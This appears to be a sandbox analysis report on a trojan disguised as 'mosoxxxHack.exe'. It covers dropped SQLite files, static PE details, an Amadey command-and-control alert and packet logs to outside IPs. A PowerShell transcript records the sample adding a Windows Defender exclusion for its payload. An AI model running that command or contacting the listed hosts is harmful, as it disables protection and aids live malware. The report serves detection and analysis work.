Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE96B.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE96C.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE96D.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE96E.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE99E.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE99F.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE9A0.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE9A1.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE9A2.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE9A3.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE9A4.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE9A5.tmp Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\20210820\PowerShell_transcript.910646.0r9FJ4A+.20210820171018.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	834
Entropy (8bit):	5.3106934803599986
Encrypted:	false
SSDEEP:	24:BxSAE5xvBnQx2DOXUWeSuULWpHjeTKKjX4CIym1ZJXyuUD:BZELvhQoO+SNipqDYB1Z0ND
MD5:	C359E7535D794A698B8E68B09DC0224F
SHA1:	20DB5796F28971D5F7BC4BC37642430967B12853
SHA-256:	DE5BC07B4923193D14177C481CD97862FD35BDD2DE110A9D2DE15D7AF1138896
SHA-512:	0EB3853DDE5644AD9EBF6F8C969D3B49CB2131FCF580306F9CDCE37D28EA31D3CA033B02EEADAEBB5237798353E05255C597BB3978A54DA3B9B5145E342AC532
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210820171046..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp\a.exe..Process ID: 5712..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210820171046..********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp\a.exe..

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.844867100305478
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mosoxxxHack.exe
File size:	2674196
MD5:	83d48ceb05204219598796cf99ade13c
SHA1:	4a0c8c188217da15ec37859e09f9ac8ad483faff
SHA256:	c8c685962497719668e4755f90ec88274dc6091379b6c6c8bebff3ad3c089672
SHA512:	b3b2b7d426bc5adf3174499ce01d6153c128bdec98638b52ca88e5670b0dede92efa1f5248fabc152938338b4797da34d75c8215f5919aa607e7f79cab3b7411
SSDEEP:	49152:p+tubxM5jdJgJ3d/aFXFn6tFYBMf5ObHiMlCqJ69tPwNhOdC1lTZDkU80:pBbO5jdeJ3IF16tFYBMfCvCw63PwDZ1v
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~........................PE..L...t..P..........#........

File Icon


Icon Hash:	30f092d0f2f2f031

Static PE Info

General
Entrypoint:	0xaac000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	5cdfba68edbb115e7aa5ed6776bb6546

Entrypoint Preview

Instruction
jmp 00007F3434F0D48Ah
xrstor [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
push esp
inc ecx
inc edi
inc edi
add byte ptr [eax], ah
add byte ptr [eax], al
and eax, 0100001Bh
add byte ptr [eax], dh
sbb byte ptr [ebx], 00000021h
push es
or dword ptr [edx], ebp
xchg byte ptr [eax-7Ah], cl
test dword ptr [A0020701h], 30121B82h
sbb byte ptr [ebx], 0000000Eh
add al, byte ptr [ecx]
add dword ptr [ecx], esi
or eax, 09060B30h
pushad
xchg byte ptr [eax+01h], cl
add eax, dword ptr [edx+eax]
add dword ptr [eax], esi
or byte ptr [edi], 00000023h
push es
or dword ptr [edx], ebp
xchg byte ptr [eax-7Ah], cl
test dword ptr [A0010701h], 04140F82h
or byte ptr [edi], 00000010h
rol byte ptr [eax], 1
add dword ptr [eax], eax
add ecx, eax
mov cl, A1h
add eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [ebx+50h], ch
add byte ptr [esi], dh
fld qword ptr [edx]
mov ecx, 02AAD04Eh
in eax, dx
mov al, B5h
nop
pop ebx
inc esp
mov dword ptr [E3A08539h], eax
adc ebp, dword ptr [esi]
mov eax, 61E81BD3h
inc esi
mov ah, A1h
add byte ptr [ecx], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi+ecx*8], dl
sub byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sub al, byte ptr [eax]
add al, byte ptr [eax]
add dword ptr [eax], eax

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022
[ASM] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x62047	0x6c	.imports
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x303f6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x19718	0xe796	False	1.0004385521	data	7.97146444014	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
	0x1b000	0x6db4	0x3931	False	0.996106823304	data	7.9270780468	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x22000	0x30c0	0x6c3	False	1.00635470826	data	7.81749943979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
	0x26000	0x3bd9e	0x191e0	False	0.997375583204	data	7.94235242234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.imports	0x62000	0x1000	0x200	False	0.201171875	data	1.43018839611	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x63000	0x30400	0x30400	False	0.245987491904	data	4.41460983759	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida	0x94000	0x3e8000	0x0	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.loadcon	0x47c000	0x1000	0x200	False	0.0859375	data	0.317809824313	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.boot	0x47d000	0x22e600	0x22e600	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.taggant	0x6ac000	0x2200	0x2014	False	0.59741841208	DOS executable (COM)	6.83025485277	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x63290	0x5701	PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
RT_ICON	0x689a4	0x2d14	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x6b6c8	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON	0x7bf00	0x94a8	data
RT_ICON	0x853b8	0x5488	data
RT_ICON	0x8a850	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 2164260863, next used block 4294967041
RT_ICON	0x8ea88	0x25a8	data
RT_ICON	0x91040	0x10a8	data
RT_ICON	0x920f8	0x988	data
RT_ICON	0x92a90	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x92f08	0x92	data
RT_VERSION	0x92fac	0x24c	data
RT_MANIFEST	0x93208	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	English	United States

Imports

DLL	Import
kernel32.dll	GetModuleHandleA
ole32.dll	OleInitialize
OLEAUT32.dll	SafeArrayCreate

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	0.0.0.0
InternalName	Minifying.exe
FileVersion	0.0.0.0
ProductVersion	0.0.0.0
FileDescription
OriginalFilename	Minifying.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/20/21-17:10:46.704150	TCP	2027700	ET TROJAN Amadey CnC Check-In	49720	80	192.168.2.3	109.234.32.63
08/20/21-17:11:09.168682	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49738	193.164.16.126	192.168.2.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 20, 2021 17:09:18.985727072 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:19.041012049 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:19.041155100 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:19.230205059 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:19.287172079 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:19.288156033 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:19.346904993 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:19.389578104 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:26.166793108 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:26.223401070 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:26.224087954 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:26.310077906 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:26.322501898 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:26.322551966 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:26.322582960 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:26.322606087 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:26.322724104 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:26.324206114 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:45.124331951 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:45.187222004 CEST	13400	49706	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:45.187346935 CEST	49706	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:45.891491890 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:45.946763992 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:45.946921110 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.075707912 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.133197069 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.135730028 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.192378044 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.192446947 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.192461967 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.192503929 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.192584038 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.249150991 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.249315977 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.249759912 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.249794006 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.249808073 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.249824047 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.249900103 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.249944925 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.249963999 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.305365086 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.305592060 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.305705070 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.305809975 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.306377888 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.306428909 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.306487083 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.306560040 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.306618929 CEST	13400	49711	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:46.306708097 CEST	49711	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:46.306801081 CEST	13400	49711	91.142.79.35	192.168.2.3
